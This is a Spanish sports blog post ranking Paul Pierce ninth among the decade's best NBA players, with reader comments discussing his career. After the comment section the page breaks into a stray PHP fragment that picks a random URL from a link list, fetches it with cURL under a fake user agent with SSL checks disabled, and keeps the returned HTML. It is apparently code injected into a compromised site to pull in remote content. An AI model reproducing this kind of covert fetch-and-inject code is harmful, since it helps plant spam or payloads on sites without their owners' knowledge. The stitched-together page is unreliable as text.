Los 10 mejores de la década: Nº09

22 de September de 2010 por Viva_Dirk
Artículo 2 de 10 de la serie Los mejores de la década

9.- PAUL PIERCE

Cuando uno es originario de Los Angeles y llega a ser capitán de los Boston Celtics es que se trata de alguien con un carácter especial. Durante varios años sufrió el calvario de estar en la franquicia con más anillos de la liga y completar temporadas con menos de 40 victorias en su casillero. El orgullo céltico, por los suelos mientras su archienemigo se hacía con 3 anillos consecutivos.

El primer gran logro de Paul Pierce con los Celtics llega en la campaña 01-02 cuando, secundado por Antoine Walker, lidera a los Celtics a 49 victorias -la mejor marca en 10 años- y a la final de conferencia. Esa temporada fue elegido además para el All-Star gracias a sus 26 puntos y 7 rebotes por noche, a la vez que conseguía su cifra máxima en robos (154) y tapones (86) a lo largo de una campaña.

Tras este año Pierce se asienta como All-Star y es un fijo entre los máximos anotadores a pesar de disponer de menos tiros a canasta que otros escoltas y aleros estelares. Desgraciadamente los verdes alternan años de Playoffs con temporadas mediocres, hasta llegar a las 24 victorias de la temporada 06-07, que coinciden con la única lesión grave de Pierce, que le hizo perderse 35 partidos.

Tras esos años grises llegó a Boston un verano mágico en el que consiguieron incorporar a sus filas a Kevin Garnett y Ray Allen, dando forma al denominado ‘Big Three’, una suma de talento en 3 jugadores que no se veía desde la década de los 80 y que ponía de nuevo el cartel de favoritos a los chicos del trébol. Las suspicacias sobre la convivencia de tanta estrella en una cancha quedaron claramente resueltas con Pierce pasando de anotar 25 puntos y lanzar 18 tiros por noche a rondar los 20 puntos y no alcanzar los 15 tiros.  A pesar de lo que puedan indicar los números, ‘The Truth’ no eludió en ningún momento la responsabilidad de ser el líder ofensivo del equipo y de ser el hombre al que todos miraban en los momentos mas calientes. Tanto fue así que, a pesar del peso específico de Garnett y Allen, cuando Boston se alzó con el título frente al archienemigo amarillo no hubo ninguna voz discordante en el momento en que Paul Pierce recibió el MVP de la final, el mayor logro individual de su carrera.

Tras esa temporada de fantasía y 66 victorias, llego otra de 62 a pesar de los problemas físicos de Kevin Garnett, problemas que les impidieron disputar el título en plenas condiciones. Y el año pasado, cuando esos permanentes problemas físicos de Garnett parecían provocar que Boston saliera de la terna de candidatos, los Celtics ganaron de una forma casi podríamos decir cómoda su conferencia. Una conferencia donde LeBron y Howard lideraban equipos de 60 victorias que fueron a estrellarse contra el espíritu céltico, encarnado en sus veteranos y con Rondo como arma arrojadiza. Así se plantaron en la final nuevamente contra los Lakers y les aseguro que los campeones aún miran para atrás en cada esquina que giran para ver si Pierce y los suyos les persiguen.

Como dije al principio, un chico de Los Angeles que encarna el espíritu céltico, más allá de sus 23 puntos por noche y de ser considerado uno de los aleros más completos de la historia, nos ha demostrado que no estaba contento siendo la superestrella de un equipo perdedor y que se moría de ganas por bajar sus números y ganar partidos. Aún nos queda por ver alguna de sus emboscadas a jóvenes incautos que subestiman el carácter de un campeón.

Comenta

7 comentarios a esta entrada

  1. sergio dice:
    #1

    A mi este tipo cada año me recuerda mas a Bodiroga: sabes lo que hace, como lo hace, a velocidad que parece lenta… y siempre la mete. Mis máximos respetos hacia este jugadorazo.

    Grandes artículos. Por ahora… dos jugadores imperdibles durante estos años y sendos MVP’s de las finales

      Citar

  2. aro_pasado_no_newtoniano dice:
    #2

    Gran artículo,,y esperemos que gran serie….por lo que va de serie,,tremenda..

    A los pies de “the truth” me pongo ahora.

      Citar

  3. TheDeerHunter dice:
    #3

    Decir que a mí en lo personal (sin haber comido sopas con él, obviamente) este tipo me estomaga. Le tengo una manía que no puedo con él… por otro lado como me pasa con muchos jugadores célticos de la historia.

    Sin embargo, en lo deportivo/profesional y como rival lo valoro al máximo. Para mí, desde luego que es un grande de esta década. Mortal y decisivo como pocos. Y eso que su porcentaje de tiro es perfectamente comparable al de algún “desheredado” que yo me sé…

    Para mí sus grandes virtudes, además de su talento, son su carácter ganador/indomable y su profesionalidad. Si no me falla la memoria voté por él en la búsqueda de los 10 mejores aleros de la historia… eso sí, en los últimos puestos, como no puede ser de otra manera.

      Citar

  4. TheDeerHunter dice:
    #4

    ¿es posible que los Celtics tengan el mejor set de aleros históricos de todas las franquicias de la NBA?

      Citar

  5. MagicJohnson32 dice:
    #5

    Es posible, aunque si hablamos de tríos prefiero el de los Nuggets: English-Kiki-Melo ¿no? Ahora que lo pienso, ojo con los Warriors: Rick Barry, Mullin y Arizin. Y los Lakers con Baylor, Worthy y Wilkes.

    Sobre Pierce, en fin, un grande sin duda. Aunque lo de la silla de ruedas no se lo perdonaré nunca… xD

      Citar

  6. Viva_Dirk dice:
    #6

    Es verdad que sus porcentajes de tiro no son gran cosa, pero se ha adaptado perfectamente a otro rol que no fuera el de ‘llanero solitario’, de hecho de entre los grandes anotadores exteriores es el que menos tiros por partido hace, 17 por partido.

      Citar

  7. TheDeerHunter dice:
    #7

    Me parece perfecto…
    Pero a diferencia de algún otro caso muy pocos se atreven a acusarle de mal tirador como tampoco de egoísta (todo lo contrario) a pesar de que su número de asistencias tampoco es nada del otro jueves.

    Por otro lado, sus condiciones tampoco me parece que sean las de un “llanero solitario”. Si lanzara muchos más tiros sus porcentajes serían mucho peores. Cuando era más joven si acaso. Como decía Sergio no es una bala precisamente…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>